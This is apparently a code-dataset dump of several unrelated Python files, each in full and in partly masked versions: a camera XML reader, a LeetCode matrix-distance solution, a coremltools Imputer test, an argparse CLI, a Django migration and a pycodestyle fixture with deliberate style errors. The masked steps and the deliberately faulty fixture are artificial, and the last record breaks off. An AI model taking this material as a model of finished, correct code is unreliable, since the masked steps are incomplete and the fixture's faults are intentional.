cameras_info[i].update({'location': a[0].firstChild.data})\n return status, cameras_info\n",
"step-5": "#!/usr/bin/env python2.7\n'''\n lib script to encapsulate the camera info\n'''\nfrom xml.dom import minidom, Node\n\n# what % of the file system remains before deleting files\n# amount that we will cleanup relative to the filesystem total\nCAMERA_XML_FILE = \"/tmp/cameras.xml\"\n\n\ndef cameras_get_info():\n '''\n cameras_get_info - reads the camera info from the XML file and\n puts it into a python data structure and returns it.\n '''\n status = 0\n xmldoc = minidom.parse(CAMERA_XML_FILE)\n itemlist = xmldoc.getElementsByTagName('camera')\n # camera info to return\n cameras_info = []\n for i in xrange(len(itemlist)):\n cameras_info.append({'id':itemlist[i].attributes['id'].value})\n a=itemlist[i].getElementsByTagName('user')\n cameras_info[i].update({'user':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('model')\n cameras_info[i].update({'model':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('passwd')\n cameras_info[i].update({'passwd':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('port')\n cameras_info[i].update({'port':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('ip_address')\n cameras_info[i].update({'ip_address':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('disk_location')\n cameras_info[i].update({'disk_location':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('mfgr')\n cameras_info[i].update({'mfgr':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('ftp_loc')\n cameras_info[i].update({'ftp_loc':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('status')\n cameras_info[i].update({'status':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('location')\n cameras_info[i].update({'location':a[0].firstChild.data})\n return status, cameras_info\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
# @Time : 2018/6/11 下午6:45
# @Author : zhanzecheng
# @File : 542.01矩阵1.py
# @Software: PyCharm
"""
# 一个简单的循环方式来解决这个问题
# 这一题的思路不错,用多次循环来计数
# TODO: check 1
class Solution:
    def updateMatrix(self, matrix):
        """
        :type matrix: List[List[int]]
        :rtype: List[List[int]]

        Rewrite each 1-cell of a 0/1 matrix with its distance to the
        nearest 0-cell (4-directional moves), in place, and return the
        matrix.

        Uses a multi-source BFS seeded with every 0-cell, which runs in
        O(rows*cols) total, replacing the original fixed-point sweep that
        rescanned the full matrix once per distance level
        (O(rows*cols*max_distance)). Output is identical for 0/1 inputs.
        """
        from collections import deque

        rows = len(matrix)
        cols = len(matrix[0])
        frontier = deque()
        # Seed the BFS with all zero cells; mark unreached cells with -1.
        for i in range(rows):
            for j in range(cols):
                if matrix[i][j] == 0:
                    frontier.append((i, j))
                else:
                    matrix[i][j] = -1
        # Expand level by level; the first time a cell is reached is its
        # shortest distance to any zero.
        while frontier:
            i, j = frontier.popleft()
            for di, dj in ((-1, 0), (1, 0), (0, -1), (0, 1)):
                ni, nj = i + di, j + dj
                if 0 <= ni < rows and 0 <= nj < cols and matrix[ni][nj] == -1:
                    matrix[ni][nj] = matrix[i][j] + 1
                    frontier.append((ni, nj))
        return matrix
if __name__ == '__main__':
    # Ad-hoc harness: solve a small 4x4 fixture and print the distances.
    solution = Solution()
    data = [
        [0, 0, 0, 0],
        [1, 1, 1, 1],
        [1, 1, 1, 1],
        [1, 1, 1, 1]
    ]
    print(solution.updateMatrix(data))
    # Larger 10x10 input fixture; note it is never actually solved below.
    data =[
        [1, 0, 1, 1, 0, 0, 1, 0, 0, 1],
        [0, 1, 1, 0, 1, 0, 1, 0, 1, 1],
        [0, 0, 1, 0, 1, 0, 0, 1, 0, 0],
        [1, 0, 1, 0, 1, 1, 1, 1, 1, 1],
        [0, 1, 0, 1, 1, 0, 0, 0, 0, 1],
        [0, 0, 1, 0, 1, 1, 1, 0, 1, 0],
        [0, 1, 0, 1, 0, 1, 0, 0, 1, 1],
        [1, 0, 0, 0, 1, 1, 1, 1, 0, 1],
        [1, 1, 1, 1, 1, 1, 1, 0, 1, 0],
        [1, 1, 1, 1, 0, 1, 0, 0, 1, 1]
    ]
    # NOTE(review): `result` and `true_result` are defined but never compared
    # against the solver's output -- presumably leftover expected fixtures
    # (a wrong and a corrected one); confirm and wire into an assertion if
    # they are still wanted.
    result = [
        [1,0,1,1,0,0,1,0,0,1],
        [0,1,1,0,1,0,1,0,1,1],
        [0,0,1,0,1,0,0,1,0,0],
        [1,0,1,0,1,1,1,1,1,1],
        [0,1,0,1,1,0,0,0,0,1],
        [0,0,1,0,1,1,1,0,1,0],
        [0,1,0,1,0,1,0,0,1,1],
        [1,0,0,0,1,2,1,1,0,1],
        [2,1,1,1,1,1,1,0,1,0],
        [1,2,1,1,0,1,0,0,1,1]
    ]
    true_result = [
        [1,0,1,1,0,0,1,0,0,1],
        [0,1,1,0,1,0,1,0,1,1],
        [0,0,1,0,1,0,0,1,0,0],
        [1,0,1,0,1,1,1,1,1,1],
        [0,1,0,1,1,0,0,0,0,1],
        [0,0,1,0,1,1,1,0,1,0],
        [0,1,0,1,0,1,0,0,1,1],
        [1,0,0,0,1,2,1,1,0,1],
        [2,1,1,1,1,2,1,0,1,0],
        [3,2,2,1,0,1,0,0,1,1]
    ]
|
normal
|
{
"blob_id": "1145050d82e614d5c248fc7e6a71720e6ff72414",
"index": 6055,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def updateMatrix(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n cur = 0\n col = len(matrix[0])\n row = len(matrix)\n while True:\n cur += 1\n flag = False\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == cur:\n if i - 1 < 0 or matrix[i - 1][j] >= cur:\n pass\n else:\n continue\n if j - 1 < 0 or matrix[i][j - 1] >= cur:\n pass\n else:\n continue\n if i + 1 >= row or matrix[i + 1][j] >= cur:\n pass\n else:\n continue\n if j + 1 >= col or matrix[i][j + 1] >= cur:\n pass\n else:\n continue\n flag = True\n matrix[i][j] += 1\n if not flag:\n break\n return matrix\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def updateMatrix(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n cur = 0\n col = len(matrix[0])\n row = len(matrix)\n while True:\n cur += 1\n flag = False\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == cur:\n if i - 1 < 0 or matrix[i - 1][j] >= cur:\n pass\n else:\n continue\n if j - 1 < 0 or matrix[i][j - 1] >= cur:\n pass\n else:\n continue\n if i + 1 >= row or matrix[i + 1][j] >= cur:\n pass\n else:\n continue\n if j + 1 >= col or matrix[i][j + 1] >= cur:\n pass\n else:\n continue\n flag = True\n matrix[i][j] += 1\n if not flag:\n break\n return matrix\n\n\nif __name__ == '__main__':\n solution = Solution()\n data = [[0, 0, 0, 0], [1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1]]\n print(solution.updateMatrix(data))\n data = [[1, 0, 1, 1, 0, 0, 1, 0, 0, 1], [0, 1, 1, 0, 1, 0, 1, 0, 1, 1],\n [0, 0, 1, 0, 1, 0, 0, 1, 0, 0], [1, 0, 1, 0, 1, 1, 1, 1, 1, 1], [0,\n 1, 0, 1, 1, 0, 0, 0, 0, 1], [0, 0, 1, 0, 1, 1, 1, 0, 1, 0], [0, 1, \n 0, 1, 0, 1, 0, 0, 1, 1], [1, 0, 0, 0, 1, 1, 1, 1, 0, 1], [1, 1, 1, \n 1, 1, 1, 1, 0, 1, 0], [1, 1, 1, 1, 0, 1, 0, 0, 1, 1]]\n result = [[1, 0, 1, 1, 0, 0, 1, 0, 0, 1], [0, 1, 1, 0, 1, 0, 1, 0, 1, 1\n ], [0, 0, 1, 0, 1, 0, 0, 1, 0, 0], [1, 0, 1, 0, 1, 1, 1, 1, 1, 1],\n [0, 1, 0, 1, 1, 0, 0, 0, 0, 1], [0, 0, 1, 0, 1, 1, 1, 0, 1, 0], [0,\n 1, 0, 1, 0, 1, 0, 0, 1, 1], [1, 0, 0, 0, 1, 2, 1, 1, 0, 1], [2, 1, \n 1, 1, 1, 1, 1, 0, 1, 0], [1, 2, 1, 1, 0, 1, 0, 0, 1, 1]]\n true_result = [[1, 0, 1, 1, 0, 0, 1, 0, 0, 1], [0, 1, 1, 0, 1, 0, 1, 0,\n 1, 1], [0, 0, 1, 0, 1, 0, 0, 1, 0, 0], [1, 0, 1, 0, 1, 1, 1, 1, 1, \n 1], [0, 1, 0, 1, 1, 0, 0, 0, 0, 1], [0, 0, 1, 0, 1, 1, 1, 0, 1, 0],\n [0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [1, 0, 0, 0, 1, 2, 1, 1, 0, 1], [2,\n 1, 1, 1, 1, 2, 1, 0, 1, 0], [3, 2, 2, 1, 0, 1, 0, 0, 1, 1]]\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\n# @Time : 2018/6/11 下午6:45\n# @Author : zhanzecheng\n# @File : 542.01矩阵1.py\n# @Software: PyCharm\n\"\"\"\n\n# 一个简单的循环方式来解决这个问题\n# 这一题的思路不错,用多次循环来计数\n# TODO: check 1\nclass Solution:\n def updateMatrix(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n cur = 0\n col = len(matrix[0])\n row = len(matrix)\n while True:\n cur += 1\n flag = False\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == cur:\n if i - 1 < 0 or matrix[i - 1][j] >= cur:\n pass\n else:\n continue\n\n if j - 1 < 0 or matrix[i][j - 1] >= cur:\n pass\n else:\n continue\n\n if i + 1 >= row or matrix[i + 1][j] >= cur:\n pass\n else:\n continue\n\n if j + 1 >= col or matrix[i][j + 1] >= cur:\n pass\n else:\n continue\n flag = True\n matrix[i][j] += 1\n if not flag:\n break\n return matrix\n\nif __name__ == '__main__':\n solution = Solution()\n data = [\n [0, 0, 0, 0],\n [1, 1, 1, 1],\n [1, 1, 1, 1],\n [1, 1, 1, 1]\n ]\n print(solution.updateMatrix(data))\n data =[\n [1, 0, 1, 1, 0, 0, 1, 0, 0, 1],\n [0, 1, 1, 0, 1, 0, 1, 0, 1, 1],\n [0, 0, 1, 0, 1, 0, 0, 1, 0, 0],\n [1, 0, 1, 0, 1, 1, 1, 1, 1, 1],\n [0, 1, 0, 1, 1, 0, 0, 0, 0, 1],\n [0, 0, 1, 0, 1, 1, 1, 0, 1, 0],\n [0, 1, 0, 1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1, 1, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 0, 1, 0],\n [1, 1, 1, 1, 0, 1, 0, 0, 1, 1]\n ]\n\n result = [\n [1,0,1,1,0,0,1,0,0,1],\n [0,1,1,0,1,0,1,0,1,1],\n [0,0,1,0,1,0,0,1,0,0],\n [1,0,1,0,1,1,1,1,1,1],\n [0,1,0,1,1,0,0,0,0,1],\n [0,0,1,0,1,1,1,0,1,0],\n [0,1,0,1,0,1,0,0,1,1],\n [1,0,0,0,1,2,1,1,0,1],\n [2,1,1,1,1,1,1,0,1,0],\n [1,2,1,1,0,1,0,0,1,1]\n ]\n true_result = [\n [1,0,1,1,0,0,1,0,0,1],\n [0,1,1,0,1,0,1,0,1,1],\n [0,0,1,0,1,0,0,1,0,0],\n [1,0,1,0,1,1,1,1,1,1],\n [0,1,0,1,1,0,0,0,0,1],\n [0,0,1,0,1,1,1,0,1,0],\n [0,1,0,1,0,1,0,0,1,1],\n [1,0,0,0,1,2,1,1,0,1],\n [2,1,1,1,1,2,1,0,1,0],\n [3,2,2,1,0,1,0,0,1,1]\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Let's look at the lowercase letters.
import string
# Space-prefixed lowercase alphabet: letters sit at indices 1..26.
alphabet = "".join((" ", string.ascii_lowercase))
|
normal
|
{
"blob_id": "da3be0d3b815e11d292a7c7e8f5ce32b35580f98",
"index": 1016,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nalphabet = ' ' + string.ascii_lowercase\n",
"step-3": "import string\nalphabet = ' ' + string.ascii_lowercase\n",
"step-4": "# Let's look at the lowercase letters.\nimport string\nalphabet = \" \" + string.ascii_lowercase\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class TflearnDataSourceExtraTemplate(object):
    """Base template for TFLearn DataSource objects (wrapping variant).

    Parameters
    ----------
    rewrite_data_aug : bool
        Whether a wrapper should be used for data augmentation.
    """

    def __init__(self, rewrite_data_aug=False):
        # Flag consulted by subclasses/wrappers; stored verbatim.
        self.rewrite_data_aug = rewrite_data_aug
|
normal
|
{
"blob_id": "70c084dab8469ca34b0e3e5174101111e695f1ca",
"index": 6638,
"step-1": "<mask token>\n",
"step-2": "class TflearnDataSourceExtraTemplate(object):\n <mask token>\n <mask token>\n",
"step-3": "class TflearnDataSourceExtraTemplate(object):\n <mask token>\n\n def __init__(self, rewrite_data_aug=False):\n self.rewrite_data_aug = rewrite_data_aug\n",
"step-4": "class TflearnDataSourceExtraTemplate(object):\n \"\"\"\n Base class for TFLearn's DataSource (if we use wrapping).\n\n Parameters:\n ----------\n rewrite_data_aug : bool\n use wrapper for data augmentation\n \"\"\"\n\n def __init__(self, rewrite_data_aug=False):\n self.rewrite_data_aug = rewrite_data_aug\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Copyright (c) 2017, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import unittest
from distutils.version import StrictVersion
import numpy as np
from coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION
if _HAS_SKLEARN:
import sklearn
from coremltools.converters import sklearn as converter
try:
# scikit-learn >= 0.21
from sklearn.impute import SimpleImputer as Imputer
sklearn_class = sklearn.impute.SimpleImputer
except ImportError:
# scikit-learn < 0.21
from sklearn.preprocessing import Imputer
sklearn_class = sklearn.preprocessing.Imputer
@unittest.skipIf(not _HAS_SKLEARN, "Missing sklearn. Skipping tests.")
class ImputerTestCase(unittest.TestCase):
"""
Unit test class for testing scikit-learn converter.
"""
@classmethod
def setUpClass(self):
"""
Set up the unit test by loading the dataset and training a model.
"""
from sklearn.datasets import load_boston
scikit_data = load_boston()
# axis parameter deprecated in SimpleImputer >= 0.22. which now imputes
# only along columns as desired here.
if _SKLEARN_VERSION >= StrictVersion("0.22"):
scikit_model = Imputer(strategy="most_frequent")
else:
scikit_model = Imputer(strategy="most_frequent", axis=0)
scikit_data["data"][1, 8] = np.NaN
input_data = scikit_data["data"][:, 8].reshape(-1, 1)
scikit_model.fit(input_data, scikit_data["target"])
# Save the data and the model
self.scikit_data = scikit_data
self.scikit_model = scikit_model
def test_conversion(self):
spec = converter.convert(self.scikit_model, "data", "out").get_spec()
self.assertIsNotNone(spec)
# Test the model class
self.assertIsNotNone(spec.description)
# Test the interface
self.assertTrue(spec.pipeline.models[-1].HasField("imputer"))
def test_conversion_bad_inputs(self):
# Error on converting an untrained model
with self.assertRaises(Exception):
model = Imputer()
spec = converter.convert(model, "data", "out")
# Check the expected class during covnersion.
with self.assertRaises(Exception):
from sklearn.linear_model import LinearRegression
model = LinearRegression()
spec = converter.convert(model, "data", "out")
|
normal
|
{
"blob_id": "d3d90b8ccd0ec449c84ac0316c429b33353f4518",
"index": 8900,
"step-1": "<mask token>\n\n\[email protected](not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n <mask token>\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n",
"step-2": "<mask token>\n\n\[email protected](not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n",
"step-3": "<mask token>\nif _HAS_SKLEARN:\n import sklearn\n from coremltools.converters import sklearn as converter\n try:\n from sklearn.impute import SimpleImputer as Imputer\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n from sklearn.preprocessing import Imputer\n sklearn_class = sklearn.preprocessing.Imputer\n\n\[email protected](not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n",
"step-4": "import unittest\nfrom distutils.version import StrictVersion\nimport numpy as np\nfrom coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION\nif _HAS_SKLEARN:\n import sklearn\n from coremltools.converters import sklearn as converter\n try:\n from sklearn.impute import SimpleImputer as Imputer\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n from sklearn.preprocessing import Imputer\n sklearn_class = sklearn.preprocessing.Imputer\n\n\[email protected](not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n",
"step-5": "# Copyright (c) 2017, Apple Inc. All rights reserved.\n#\n# Use of this source code is governed by a BSD-3-clause license that can be\n# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause\n\nimport unittest\nfrom distutils.version import StrictVersion\n\nimport numpy as np\n\nfrom coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION\n\nif _HAS_SKLEARN:\n import sklearn\n\n from coremltools.converters import sklearn as converter\n try:\n # scikit-learn >= 0.21\n from sklearn.impute import SimpleImputer as Imputer\n\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n # scikit-learn < 0.21\n from sklearn.preprocessing import Imputer\n\n sklearn_class = sklearn.preprocessing.Imputer\n\[email protected](not _HAS_SKLEARN, \"Missing sklearn. Skipping tests.\")\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n\n scikit_data = load_boston()\n # axis parameter deprecated in SimpleImputer >= 0.22. 
which now imputes\n # only along columns as desired here.\n if _SKLEARN_VERSION >= StrictVersion(\"0.22\"):\n scikit_model = Imputer(strategy=\"most_frequent\")\n else:\n scikit_model = Imputer(strategy=\"most_frequent\", axis=0)\n scikit_data[\"data\"][1, 8] = np.NaN\n\n input_data = scikit_data[\"data\"][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data[\"target\"])\n\n # Save the data and the model\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, \"data\", \"out\").get_spec()\n self.assertIsNotNone(spec)\n\n # Test the model class\n self.assertIsNotNone(spec.description)\n\n # Test the interface\n self.assertTrue(spec.pipeline.models[-1].HasField(\"imputer\"))\n\n def test_conversion_bad_inputs(self):\n # Error on converting an untrained model\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, \"data\", \"out\")\n\n # Check the expected class during covnersion.\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n\n model = LinearRegression()\n spec = converter.convert(model, \"data\", \"out\")\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/env python3
import argparse
from speaker.main import run
def parse_args():
parser = argparse.ArgumentParser(description='Network speaker device.')
parser.add_argument('-d', '--debug', action='store_true',
help='enable debugging messages')
parser.add_argument('--host', type=str,
help='IP address to bind network services to')
parser.add_argument('--grpc-port', type=int,
help='port for the gRPC service')
parser.add_argument('--rtsp-port', type=int,
help='port for the RTSP service')
parser.add_argument('--spotifyd-path', type=str,
help='path to a spotifyd binary')
return parser.parse_args()
if __name__ == '__main__':
run(parse_args())
|
normal
|
{
"blob_id": "bb173d8869039f8bbd3e35529cf2d99b26d2b8ff",
"index": 7130,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Network speaker device.')\n parser.add_argument('-d', '--debug', action='store_true', help=\n 'enable debugging messages')\n parser.add_argument('--host', type=str, help=\n 'IP address to bind network services to')\n parser.add_argument('--grpc-port', type=int, help=\n 'port for the gRPC service')\n parser.add_argument('--rtsp-port', type=int, help=\n 'port for the RTSP service')\n parser.add_argument('--spotifyd-path', type=str, help=\n 'path to a spotifyd binary')\n return parser.parse_args()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Network speaker device.')\n parser.add_argument('-d', '--debug', action='store_true', help=\n 'enable debugging messages')\n parser.add_argument('--host', type=str, help=\n 'IP address to bind network services to')\n parser.add_argument('--grpc-port', type=int, help=\n 'port for the gRPC service')\n parser.add_argument('--rtsp-port', type=int, help=\n 'port for the RTSP service')\n parser.add_argument('--spotifyd-path', type=str, help=\n 'path to a spotifyd binary')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n run(parse_args())\n",
"step-4": "import argparse\nfrom speaker.main import run\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Network speaker device.')\n parser.add_argument('-d', '--debug', action='store_true', help=\n 'enable debugging messages')\n parser.add_argument('--host', type=str, help=\n 'IP address to bind network services to')\n parser.add_argument('--grpc-port', type=int, help=\n 'port for the gRPC service')\n parser.add_argument('--rtsp-port', type=int, help=\n 'port for the RTSP service')\n parser.add_argument('--spotifyd-path', type=str, help=\n 'path to a spotifyd binary')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n run(parse_args())\n",
"step-5": "#!/usr/bin/env python3\n\nimport argparse\nfrom speaker.main import run\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Network speaker device.')\n parser.add_argument('-d', '--debug', action='store_true',\n help='enable debugging messages')\n parser.add_argument('--host', type=str,\n help='IP address to bind network services to')\n parser.add_argument('--grpc-port', type=int,\n help='port for the gRPC service')\n parser.add_argument('--rtsp-port', type=int,\n help='port for the RTSP service')\n parser.add_argument('--spotifyd-path', type=str,\n help='path to a spotifyd binary')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n run(parse_args())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 2.1.7 on 2019-03-23 17:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('currency_exchange', '0007_auto_20190323_1751'),
]
operations = [
migrations.AddField(
model_name='tasks',
name='hours',
field=models.DecimalField(decimal_places=12, default=0, max_digits=24),
),
migrations.AddField(
model_name='tasks',
name='status',
field=models.CharField(default='in progress', max_length=100),
),
]
|
normal
|
{
"blob_id": "1f63ce2c791f0b8763aeae15df4875769f6de848",
"index": 4942,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('currency_exchange', '0007_auto_20190323_1751')]\n operations = [migrations.AddField(model_name='tasks', name='hours',\n field=models.DecimalField(decimal_places=12, default=0, max_digits=\n 24)), migrations.AddField(model_name='tasks', name='status', field=\n models.CharField(default='in progress', max_length=100))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('currency_exchange', '0007_auto_20190323_1751')]\n operations = [migrations.AddField(model_name='tasks', name='hours',\n field=models.DecimalField(decimal_places=12, default=0, max_digits=\n 24)), migrations.AddField(model_name='tasks', name='status', field=\n models.CharField(default='in progress', max_length=100))]\n",
"step-5": "# Generated by Django 2.1.7 on 2019-03-23 17:14\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('currency_exchange', '0007_auto_20190323_1751'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='tasks',\n name='hours',\n field=models.DecimalField(decimal_places=12, default=0, max_digits=24),\n ),\n migrations.AddField(\n model_name='tasks',\n name='status',\n field=models.CharField(default='in progress', max_length=100),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
from typing import ClassVar, List
print(1, 2)
# Annotated function (Issue #29)
def foo(x: int) -> int:
return x + 1
# Annotated variables #575
CONST: int = 42
class Class:
cls_var: ClassVar[str]
def m(self):
xs: List[int] = []
# True and False are keywords in Python 3 and therefore need a space.
#: E275:13 E275:14
norman = True+False
#: E302+3:0
def a():
pass
async def b():
pass
# Okay
async def add(a: int = 0, b: int = 0) -> int:
return a + b
# Previously E251 four times
#: E221:5
async def add(a: int = 0, b: int = 0) -> int:
return a + b
# Previously just E272+1:5 E272+4:5
#: E302+3 E221:5 E221+3:5
async def x():
pass
async def x(y: int = 1):
pass
#: E704:16
async def f(x): return 2
a[b1, :] == a[b1, ...]
# Annotated Function Definitions
# Okay
def munge(input: AnyStr, sep: AnyStr = None, limit=1000,
extra: Union[str, dict] = None) -> AnyStr:
pass
#: E225:24 E225:26
def x(b: tuple = (1, 2))->int:
return a + b
#: E252:11 E252:12 E231:8
def b(a:int=1):
pass
if alpha[:-i]:
*a, b = (1, 2, 3)
# Named only arguments
def foo(*, asdf):
pass
def foo2(bar, *, asdf=2):
pass
|
normal
|
{
"blob_id": "689c6c646311eba1faa93cc72bbe1ee4592e45bc",
"index": 8392,
